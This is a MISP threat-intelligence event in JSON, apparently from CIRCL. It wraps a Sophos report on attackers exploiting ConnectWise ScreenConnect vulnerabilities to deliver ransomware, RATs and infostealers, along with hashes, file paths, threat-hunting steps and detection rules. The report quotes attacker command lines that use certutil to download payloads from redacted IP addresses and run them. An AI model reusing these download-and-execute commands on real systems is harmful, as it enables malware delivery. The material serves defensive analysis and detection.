277 lines
No EOL
32 KiB
JSON
277 lines
No EOL
32 KiB
JSON
{
|
|
"Event": {
|
|
"analysis": "2",
|
|
"date": "2024-02-23",
|
|
"extends_uuid": "",
|
|
"info": "OSINT - ConnectWise ScreenConnect attacks deliver malware",
|
|
"publish_timestamp": "1708700002",
|
|
"published": true,
|
|
"threat_level_id": "2",
|
|
"timestamp": "1708699989",
|
|
"uuid": "f8912a82-2870-4de2-9663-5fdbee0ed401",
|
|
"Orgc": {
|
|
"name": "CIRCL",
|
|
"uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f"
|
|
},
|
|
"Tag": [
|
|
{
|
|
"colour": "#004646",
|
|
"local": false,
|
|
"name": "type:OSINT",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#0071c3",
|
|
"local": false,
|
|
"name": "osint:lifetime=\"perpetual\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#ffffff",
|
|
"local": false,
|
|
"name": "tlp:white",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#ffffff",
|
|
"local": false,
|
|
"name": "tlp:clear",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#0088cc",
|
|
"local": false,
|
|
"name": "misp-galaxy:mitre-attack-pattern=\"Exploit Public-Facing Application - T1190\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#0088cc",
|
|
"local": false,
|
|
"name": "misp-galaxy:producer=\"Sophos\"",
|
|
"relationship_type": ""
|
|
}
|
|
],
|
|
"Object": [
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "Report object to describe a report along with its metadata.",
|
|
"meta-category": "misc",
|
|
"name": "report",
|
|
"template_uuid": "70a68471-df22-4e3f-aa1a-5a3be19f82df",
|
|
"template_version": "8",
|
|
"timestamp": "1708696126",
|
|
"uuid": "de430685-633a-48a8-b7eb-55c7168f5bce",
|
|
"Attribute": [
|
|
{
|
|
"category": "External analysis",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "link",
|
|
"timestamp": "1708696126",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "cd7cc81c-2a76-410d-ba7e-cc1b8fe2a068",
|
|
"value": "https://news.sophos.com/en-us/2024/02/23/connectwise-screenconnect-attacks-deliver-malware/"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "summary",
|
|
"timestamp": "1708696126",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "bb5a7f61-4c78-4f14-961b-29f2fa87ab0d",
|
|
"value": "ConnectWise ScreenConnect attacks deliver malware\r\nMultiple attacks exploit vulnerabilities in an IT remote access tool to deliver a variety of different payloads into business environments"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "title",
|
|
"timestamp": "1708696126",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "56f9f969-bbff-493f-924a-9268ba0a828d",
|
|
"value": "https://news.sophos.com/en-us/2024/02/23/connectwise-screenconnect-attacks-deliver-malware/"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "type",
|
|
"timestamp": "1708696126",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "2bfbc86e-b3bd-41fa-bbf2-f7f8519d4402",
|
|
"value": "Blog"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "Vulnerability object describing a common vulnerability enumeration which can describe published, unpublished, under review or embargo vulnerability for software, equipments or hardware.",
|
|
"meta-category": "vulnerability",
|
|
"name": "vulnerability",
|
|
"template_uuid": "81650945-f186-437b-8945-9f31715d32da",
|
|
"template_version": "8",
|
|
"timestamp": "1708696355",
|
|
"uuid": "85a30426-433a-4ec0-ac82-ac8a13b0b2ac",
|
|
"Attribute": [
|
|
{
|
|
"category": "External analysis",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "id",
|
|
"timestamp": "1708696355",
|
|
"to_ids": false,
|
|
"type": "vulnerability",
|
|
"uuid": "4554b911-da2d-45c7-9e09-d3f0c5851802",
|
|
"value": "CVE-2024-1709"
|
|
},
|
|
{
|
|
"category": "External analysis",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "id",
|
|
"timestamp": "1708696355",
|
|
"to_ids": false,
|
|
"type": "vulnerability",
|
|
"uuid": "916f9502-0c0c-43f9-b1e9-1e483784c441",
|
|
"value": "CVE-2024-1708"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "At least one threat actor is abusing ScreenConnect to deploy a ransomware executable. Sophos suspects it is the same person or group; an identical payload (SHA-256 2da975fee507060baa1042fb45e8467579abf3f348f1fd37b86bb742db63438a) was discovered in more than 30 different customer networks, beginning on February 22. This distribution pattern is strongly indicative of the threat actor pushing the payload from a compromised server.",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "24",
|
|
"timestamp": "1708696459",
|
|
"uuid": "01d80244-d9bb-4eef-a64c-6067475a21da",
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1708696459",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "1df4d32e-5cea-4bee-84c4-8d5b25f43653",
|
|
"value": "2da975fee507060baa1042fb45e8467579abf3f348f1fd37b86bb742db63438a"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "state",
|
|
"timestamp": "1708696459",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "14ea9f28-7e0b-42f4-a677-f5fc8c80b228",
|
|
"value": "Malicious"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "We also saw a different attacker attempt to drop another payload (a50d9954c0a50e5804065a8165b18571048160200249766bfa2f75d03c8cb6d0) using the certutil utility to download it from a web address, write it to the root of the C:\\ drive with the filename svchost.exe, and execute it. In this case, the behavioral rule Lateral_1b blocked the file from being downloaded and the attack failed.",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "24",
|
|
"timestamp": "1708696598",
|
|
"uuid": "1cd45224-4b4c-4889-829a-343692331a52",
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1708696598",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "c8b7446f-d248-4304-94c1-4607a17a3c13",
|
|
"value": "a50d9954c0a50e5804065a8165b18571048160200249766bfa2f75d03c8cb6d0"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "state",
|
|
"timestamp": "1708696599",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "33a3368d-c0d9-4a07-b2e1-12afefc1c296",
|
|
"value": "Malicious"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "Telemetry indicates attackers are also pushing the Vidar/Redline data stealer malware (SHA-256 c94038781c56ab85d2f110db4f45b86ccf269e77a3ff4b9133b96745ff97d25f) via ScreenConnect. The HMPA CookieGuard and TTP classifications (T1555.003) trigger on this type of attack. The attack looks like the ScreenConnect.WindowsClient.exe launches the malware from this location:",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "24",
|
|
"timestamp": "1708696711",
|
|
"uuid": "5ce43c0d-825a-420f-9c87-8b053137f8e5",
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1708696711",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "3f741526-c39a-4d48-88e5-91eceef5a9b5",
|
|
"value": "c94038781c56ab85d2f110db4f45b86ccf269e77a3ff4b9133b96745ff97d25f"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "state",
|
|
"timestamp": "1708696711",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "fba2e988-2639-4700-b4c5-2a8cd3759d67",
|
|
"value": "Malicious"
|
|
}
|
|
]
|
|
}
|
|
],
|
|
"EventReport": [
|
|
{
|
|
"name": "Report from - https://news.sophos.com/en-us/2024/02/23/connectwise-screenconnect-attacks-deliver-malware/ (1708696253)",
|
|
"content": "# Situation overview\r\n\r\n On February 19, 2024, ConnectWise released a security advisory for its remote monitoring and management (RMM) software. Their advisory highlighted two vulnerabilities that impact older versions of ScreenConnect and have been **mitigated in version 23.9.8 and later.**\r\n\r\n ConnectWise states in the advisory these vulnerabilities are rated as **\u201cCritical\u2014Vulnerabilities that could allow the ability to execute remote code or directly impact confidential data or critical systems\u201d.** The two vulnerabilities are:\r\n\r\n \r\n * CVE-2024-1709 (CWE-288) \u2014 Authentication Bypass Using Alternate Path or Channel \r\n\t + Base CVSS score of 10, indicating \u201cCritical\u201d \r\n * CVE-2024-1708 (CWE-22) \u2014 Improper Limitation of a Pathname to a Restricted Directory (\u201cPath Traversal\u201d) \r\n\t + Base CVSS score of 8.4, still considered \u201cHigh Priority\u201d \r\n \r\n The vulnerabilities can affect both the ScreenConnect server and ScreenConnect client software, in different ways. Attackers have found that they can deploy malware to servers or to workstations with the client software installed. Sophos has evidence that attacks against both servers and client machines are currently underway. Patching the server will not remove any malware or webshells attackers manage to deploy prior to patching and any compromised environments need to be investigated.\r\n\r\n Cloud-hosted implementations of ScreenConnect, including screenconnect.com and hostedrmm.com, have already received updates to address these vulnerabilities. Self-hosted (on-premise) instances remain at risk until they are manually upgraded, and it is our recommendation to patch to ScreenConnect version 23.9.8 immediately. The upgrade is available on ScreenConnect\u2019s download page.\r\n\r\n On February 21, 2024, proof of concept (PoC) code was released on GitHub that exploits these vulnerabilities and adds a new user to the compromised system. ConnectWise has also updated their initial report to include observed, active exploitation in the wild of these vulnerabilities.\r\n\r\n On February 22, 2024, Sophos X-Ops reported through our social media handle that despite the recent law enforcement activity against the LockBit threat actor group we had observed several attacks over the preceding 24 hours that appeared to be carried out with LockBit ransomware, built using a leaked malware builder tool. It appears that our signature-based detection correctly identified the payloads as ransomware generated by the leaked LockBit builder, but the ransom notes dropped by those payloads identified one as \u201cbuhtiRansom,\u201d and the other did not have a name in its ransom note.\r\n\r\n This article includes additional details and analysis of the ScreenConnect attacks Sophos observed in the past 48 hours.\r\n\r\n # Recommendations\r\n\r\n \r\n * Confirm whether you have an on-premises deployment of ScreenConnect Server \r\n\t + If you have an on-premises instance in your environment running a version prior to 23.9.8, take it offline immediately until you upgrade to the newest version; isolate or shut it down until it is patched and investigated for signs of exploitation\r\n\t + If you have an on-premises version in your environment that was updated to version 23.9.8 or later prior to February 21, you are not at risk, though it would be prudent to inspect the server to ensure no malicious payloads were installed\r\n\t + If you use the cloud-hosted version, you are not at risk and no further actions are necessary \r\n * If your deployment of ScreenConnect Server is hosted by a third-party vendor, confirm with them they have upgraded their instance to 23.9.8 or later; if they have not, recommend that they take it offline until the patches are applied\r\n * Scan your environment and customer environments for instances of ScreenConnect that you may not be aware of, to avoid the risk of those ScreenConnect being unpatched and exposing the environment to a Supply Chain Attack\r\n * If you have ScreenConnect clients and are unsure of/unable to determine the patch status of all servers that may connect to it, you should presume these servers are vulnerable until you can verify otherwise\r\n * You can protect ScreenConnect clients from vulnerable servers by implementing Sophos Application Control Policy to block ScreenConnect until the servers can be verified to be patched More details on Application Control can be found on our site\r\n * Once patching has been completed, perform a thorough review of the ScreenConnect installation looking for unknown accounts and abnormal server activity. \r\n\t + Review the users.xml for signs of new accounts or modifications\r\n\t + Assume that any machines hosting a ScreenConnect server could have one or more implanted web shells (or other remote access tools not installed by your IT team) that need to be found and removed\r\n\t + Inspect your estate for newly added user IDs or accounts and remove or freeze access to them until they are known to be legitimate\r\n\t + In an on-premises installation, check the location where any ScreenConnect Extensions are located for webshells or other payloads (files with .ps1, .bat or .cmd file suffixes) \r\n * Deploy endpoint security to any server currently or formerly used to run ScreenConnect\r\n * XG Firewall customers will soon be able to enable new IDS signatures designed to detect malicious activity related to ScreenConnect exploits\r\n * If you know how to use penetration-testing tools like the Metasploit Framework, there is already a Metasploit module you can use to test whether your devices are vulnerable. There are several other proofs-of-concept in the wild, as well\r\n \r\n # Attacks involving ScreenConnect\r\n\r\n Since the news broke this week about the vulnerability in ScreenConnect, Sophos analysts have been closely monitoring telemetry systems looking for any anomalous or malicious behavior in which the ScreenConnect client or server software was either the root cause or was part of the attack chain in some way. The teams then sifted through this noisy log data to isolate and document specific malicious activity.\r\n\r\n Before this vulnerability had become widely known, there had been a moderate number of daily telemetry entries in which threat actors attempted to deploy malware or run a malicious command on a customer machine running ScreenConnect. However, since February 21, the daily volume of telemetry events involving ScreenConnect has more than doubled.\r\n\r\n *Figure 1: A 90-day summary of hits with a ScreenConnect parent process on machines; note the spike in the last few days*\r\n\r\n Many companies and managed service providers use ScreenConnect, and not all behavior we observed came as a direct result of the vulnerability being exploited, but Sophos believes a significant number of the current wave of telemetry events were captured as a direct result of the increased threat actor attention to ScreenConnect.\r\n\r\n Threat actors have been leveraging the exploits against ScreenConnect to launch a wide variety of attacks and deliver a range of different types of malware to target machines. What follows is a brief summary of some of the incidents we are currently tracking.\r\n\r\n ## LockBit ransomware, built with a leaked malware compiler\r\n\r\n At least one threat actor is abusing ScreenConnect to deploy a ransomware executable. Sophos suspects it is the same person or group; an identical payload (SHA-256 2da975fee507060baa1042fb45e8467579abf3f348f1fd37b86bb742db63438a) was discovered in more than 30 different customer networks, beginning on February 22. This distribution pattern is strongly indicative of the threat actor pushing the payload from a compromised server.\r\n\r\n The executable in question was built using the LockBit 3 ransomware builder tool leaked in 2022, so this particular sample may not have originated with the actual LockBit developers. Our detection for this generation of LockBit (Troj/Ransom-GYT) was built specifically to detect samples generated by the leaked builder tool before they run. We\u2019ve also seen a memory detection rule (Mem/LockBit-B) stopping the execution of both the original and the copycat builds of LockBit in some cases.\r\n\r\n However, the ransomware did not call itself LockBit.\r\n\r\n *Figure 2: The ransom note dropped by this malware self-identifies as \u201cbuhtiRansom\u201d*\r\n\r\n *Figure 3: This root-cause analysis (RCA) graph highlights malicious activity during the attacks involving the \u201cbuhtiRansom\u201d LockBit variant*\r\n\r\n The attackers deploying this ransomware executable have consistently used the filename of \u201cenc.exe\u201d or \u201cupd.exe\u201d in the following locations\r\n\r\n <d>\\Windows\\Temp\\ScreenConnect\\23.9.6.8787\\upd.exe <d>\\Windows\\Temp\\ScreenConnect\\23.9.6.8787\\enc.exe <d>\\users\\[username]\\temp\\enc.exe The \u201cbuhtiRansom\u201d LockBit variant was not the only ransomware we spotted in the wild.\r\n\r\n We also saw a different attacker attempt to drop another payload (a50d9954c0a50e5804065a8165b18571048160200249766bfa2f75d03c8cb6d0) using the certutil utility to download it from a web address, write it to the root of the C:\\ drive with the filename svchost.exe, and execute it. In this case, the behavioral rule Lateral\\_1b blocked the file from being downloaded and the attack failed.\r\n\r\n <d>\\Program Files (x86)\\ScreenConnect Client (60ccb130004e2bbf)\\ScreenConnect.ClientService.exe -> certutil.exe -urlcache -f http://<ip-address>/svchost.exe c:\\svchost.exe While it failed to deploy on the customer environment, when we ran it on a sandbox, it dropped a ransom note that looks like this:\r\n\r\n *Figure 4: The ransom note we observed in a sandboxed environment*\r\n\r\n The malware also changed the desktop background to this:\r\n\r\n *Figure 5: The desktop background we observed*\r\n\r\n So at least this sample self-identifies as a variant based on the Lockbit builder code.\r\n\r\n ## AsyncRAT attacks\r\n\r\n The Labs team who manage our CryptoGuard and HitmanPro tools noticed a burst of detections downstream of ScreenConnect. Digging in, we can see these attacks, in which a malicious process is triggering our HollowProcess detection against PowerShell, intend to deliver AsyncRAT as a payload.\r\n\r\n ## Password stealers\r\n\r\n Telemetry indicates attackers are also pushing the Vidar/Redline data stealer malware (SHA-256 c94038781c56ab85d2f110db4f45b86ccf269e77a3ff4b9133b96745ff97d25f) via ScreenConnect. The HMPA CookieGuard and TTP classifications (T1555.003) trigger on this type of attack. The attack looks like the ScreenConnect.WindowsClient.exe launches the malware from this location:\r\n\r\n <d>\\Users\\<username>\\Documents\\ConnectWiseControl\\Temp\\UpdaterScreenConnect.exe ## SimpleHelp remote access client, followed by ransomware\r\n\r\n One threat actor abused ScreenConnect to push another remote access client to the target machine. In this example, the attacker used ScreenConnect.WindowsClient.exe to launch the SimpleHelp installer (named first.exe) from this location:\r\n\r\n <d>\\Windows\\Temp\\ScreenConnect\\20.13.1905.7657\\Files\\first.exe Five hours later, on the same machine, we observed ransom notes appear on the system and files renamed with a different file extension. The ransomware had been installed using the msiexec.exe utility. The process tree for this event looked like this:\r\n\r\n services.exe -> msiexec.exe -> <d>\\Windows\\TEMP\\MW-5f3810bb-bac1-4cc4-a1a3-7e04046d7ea4\\files\\crypt64ult.exe *Figure 6: A root-cause analysis (RCA) diagram shows services.exe launching msiexec.exe, which in turn launches the ransomware crypt64ult.exe, which changes a file\u2019s file extension to .CRYPT*\r\n\r\n A few minutes later, the attackers use ScreenConnect to run a command that downloads another malware payload to this machine, using the Windows certutil utility, then runs it.\r\n\r\n ScreenConnect.ClientService.exe -> cmd.exe /c c:\\windows\\temp\\ScreenConnect\\20.13.1905\\7657\\<guid>run.cmd -> certutil -urlcache -f http://<ip>:8084/msappdata.msi c:\\mpyutd.msi ## Rust infostealer\r\n\r\n *Figure 7: The Rust infostealer attack tree*\r\n\r\n Attackers use the ScreenConnect client utility to run a batch script they\u2019ve downloaded into the folder belonging to another remote access tool, called InVentry Remote Support. The batch script downloads a payload, written in Rust, from an AWS storage server. The payload, when it runs, injects itself into Explorer.exe then deletes itself from the filesystem.\r\n\r\n Analysts have not studied the payload, but several other vendors classify it as malware called Redcap, which is used to steal and exfiltrate information from servers.\r\n\r\n ## Cobalt Strike payloads\r\n\r\n On February 22, three unrelated companies (two in North America, one in Europe) were hit with a remarkably similar attack that delivered a Cobalt Strike beacon to a machine in the network with the ScreenConnect client installed. The telemetry indicated that in all three cases, the Cobalt Strike payload was caught and prevented from running by a behavioral rule called AMSI/Cobalt-A.\r\n\r\n The ScreenConnect client received a file with a .cmd extension in the temporary directory where it stores downloaded files, then executed it. The .cmd tried to launch PowerShell to use it to download the beacon, but was stopped by the endpoint rule. Subsequent analysis revealed that the payload was retrieved from the same C2 server in all three cases.\r\n\r\n ## Xworm payload attempted delivery to home user\r\n\r\n One machine that was running the ScreenConnect client software was attacked with malware called Xworm. The exploit caused the client to write a file into the %temp% directory and then triggered the client to run it. The file contained a one-line PowerShell command that downloaded a 531KB file from a public Pastebin-type server. The file was, itself, a script that contained a massive data blob and a small amount of script code to transform the data into a Windows executable.\r\n\r\n *Figure 8: An excerpt from the payload*\r\n\r\n Once decoded, the malware uses a variety of persistence methods and can spread to other machines by copying itself to USB storage media. It is also a full-featured RAT and adds an exclusion for itself to Windows Defender. However, the endpoint protection on the customer\u2019s machine prevented it from being infected. The signatures Troj/RAT-FJ and Troj/PSDrop-IU effectively neutralized the threat before it could cause harm.\r\n\r\n ## Safe Mode RAT deploys its own ScreenConnect for persistence\r\n\r\n In an attack against the ScreenConnect server instances, a threat actor is pushing an executable named patch3.exe to vulnerable servers. The patch3 executable is a RAT with some interesting behaviors; It apparently adds entries into the registry so that it will start up even if the computer is booted into Safe Mode. It also downloads an .msi installer.\r\n\r\n *Figure 9: Part of an observed attack by the Safe Mode RAT*\r\n\r\n MDR analysts looking more closely into this sample determined that the threat actor was installing a new instance of the ScreenConnect client on the infected device, then using their (the attackers\u2019) own ScreenConnect client to talk to (and remotely manage) the target\u2019s ScreenConnect server. The infected device later launched various PowerShell commands. Irony isn\u2019t dead.\r\n\r\n # Threat hunting information\r\n\r\n The simplicity of exploiting these vulnerabilities makes it imperative for organizations to assess their exposure and take decisive steps to mitigate risks. The following points offer a high-level guide to investigate your environment:\r\n\r\n \r\n 2. **Identification of ScreenConnect installations:** The first step involves locating all instances of ScreenConnect within your organization\u2019s network. Remember, some of these installations might be managed by external service providers, so thoroughness is key. The server component is ultimately what needs patched, but knowing the scope of client installations will help assess exposure\r\n 4. **Isolation and removal:** Temporarily isolate or uninstall the ScreenConnect Client software from identified devices. This measure is critical until you can confirm that the server has been updated with the necessary security patches or until a comprehensive analysis is conducted. If you don\u2019t manage the ScreenConnect Server for your environment, uninstallation may be the fastest route to mitigate the risk\r\n 6. **Conduct detailed analysis:** On devices with ScreenConnect client software, perform an in-depth investigation. Focus on: \r\n\t * **Creation of new local users:** Check for any unauthorized new user accounts which were created.\r\n\t * **Suspicious client software activity:** Monitor for unusual commands executed by the ScreenConnect client\r\n\t * **System and domain reconnaissance activities:** Look for commands that indicate scanning or probing of your systems.\r\n\t * **Disabling of security controls:** Look for any actions that attempt to deactivate security measures, such as anti-virus software and local firewall policies. \r\n 8. **Initiate Incident Response if needed:** If your analysis uncovers any suspicious activities, promptly activate your incident response plan. This step is crucial to understand the scope of the potential incident and to implement remediation strategies\r\n \r\n Sophos X-Ops Incident Response has built a series of XDR queries for customers to use for threat hunting in their environment. These queries include the following:\r\n\r\n \r\n * Check version of ScreenConnect Server \u2013 Identifies machines running ScreenConnect Server vulnerable to Authentication Bypass (CVE-2024-1709 & CVE-2024-1708)\r\n * Check version of ScreenConnect Server.sql (datalake) \u2013 Identifies machines running ScreenConnect Server vulnerable to Authentication Bypass (CVE-2024-1709 & CVE-2024-1708)\r\n * ScreenConnect Relay IP \u2013 Identify the IP addresses that the ScreenConnect application running on machines is connecting to. these IP addresses can be utilized in external tools like Shodan.io and Censys.io to assess if the ScreenConnect server corresponding to these endpoints is vulnerable to CVE-2024-1709 and CVE-2024-1708\r\n * SetupWizard.aspx in IIS logs \u2013 Look for the trailing slash after SetupWizard.aspx in the IIS logs, which can be an indicator of possible exploitation of Screenconnect auth bypass\r\n * Check user.xml file for new users created \u2013 Check the User.xml file found in the ScreenConnect\\App\\_Data folder for possible signs of exploitation in the ScreenConnect Server. The content of the file will be updated when an attacker executes the exploit and creates a new user\r\n * Evidence of temporary User File creation \u2013 Check for temporary user creation XML files on disk within a time range. This file can be an indicator for possible exploitation of CVE-2024-1709.\r\n * Check for .ASPX .ASHX files in App\\_Extensions folder \u2013 Detect potential exploitation of CVE-2024-1708 on a machine hosting a ScreenConnect server by looking for .ASPX and .ASHX files written in the \\ScreenConnect\\App\\_Extensions folder\r\n * Identify shells being spawned from ScreenConnect \u2013 Identify shells being spawned from ScreenConnect process.\r\n \r\n # Detection and protection\r\n\r\n The following detection rules were previously implemented to identify abuse of ScreenConnect and are still viable for identifying post-exploitation activity.\r\n\r\n \r\n * WIN-EXE-PRC-SCREENCONNECT-COMMAND-EXECUTION-1\r\n * WIN-EXE-PRC-SCREENCONNECT-REMOTE-FILE-EXECUTION-1\r\n * WIN-EXE-PRC-SCREENCONNECT-RUNFILE-EXECUTION-1\r\n \r\n We have multiple protections within InterceptX to block post-exploitation activity. We\u2019ve also released the following detection for publicly available exploit scripts seen targeting CVE-2024-1709 (CWE-288) \u2014 Authentication Bypass Using Alternate Path or Channel:\r\n\r\n \r\n * ATK/SCBypass-A\r\n \r\n Protections for SFOS and EPIPS:\r\n\r\n **SID** **Name** 2309339 Connectwise Screenconnect Authentication Bypass Vulnerability 2309343 Connectwise Screenconnect Authentication Bypass Vulnerability 2309344 Connectwise Screenconnect Authentication Bypass Vulnerability \r\n\r\n # Acknowledgments\r\n\r\n Anthony Bradshaw, Paul Jaramillo, Jordon Olness, Benjamin Sollman and Dakota Mercer-Szady from MDR\r\n\r\n Anand Ajjan, Fraser Howard, Rajesh Nataraj, Gabor Szappanos, and Ronny Tijink from SophosLabs\r\n\r\n Peter Mackenzie, Elida Leite and Lee Kirkpatrick from Incident Response\r\n\r\n \r\n * Share on Facebook \r\n * Share on X \r\n * Share on LinkedIn \r\n * \r\n \r\n .entry-social #post-## .author-profile About the Author ### Andrew Brandt\r\n\r\n Sophos X-Ops Principal Researcher Andrew Brandt blends a 20-year journalism background with deep, retrospective analysis of malware infections, ransomware, and cyberattacks as the editor of SophosLabs Uncut. His work with the Labs team helps Sophos protect its global customers, and alerts the world about notable criminal behavior and activity, whether it's normal or novel. Follow him at @threatresearch@infosec.exchange on Mastadon for up-to-the-minute news about all things malicious.\r\n\r\n .author-bio .author-block-container .author-profile About the Author ### Angela Gunn\r\n\r\n Angela Gunn is a senior threat researcher in Sophos X-Ops. As a journalist and columnist for two decades, her outlets included USA Today, PC Magazine, Computerworld, and Yahoo Internet Life. Since morphing into a full-time technologist, she has focused on incident response, privacy, threat modeling, GRC, OSINT, and security training at companies including Microsoft, HPE, BAE AI, and SilverSky.\r\n\r\n .author-bio .author-block-container ### Read Similar Articles\r\n\r\n \r\n #respond #comments #comments #main #primary #content Subscribe to get the latest updates in your inbox. Which categories are you interested in? You\u2019re now subscribed!",
|
|
"id": "404",
|
|
"event_id": "208171",
|
|
"timestamp": "1708696281",
|
|
"uuid": "c077c950-3bc9-4a59-be82-a7388d56e53e",
|
|
"deleted": false
|
|
}
|
|
]
|
|
}
|
|
} |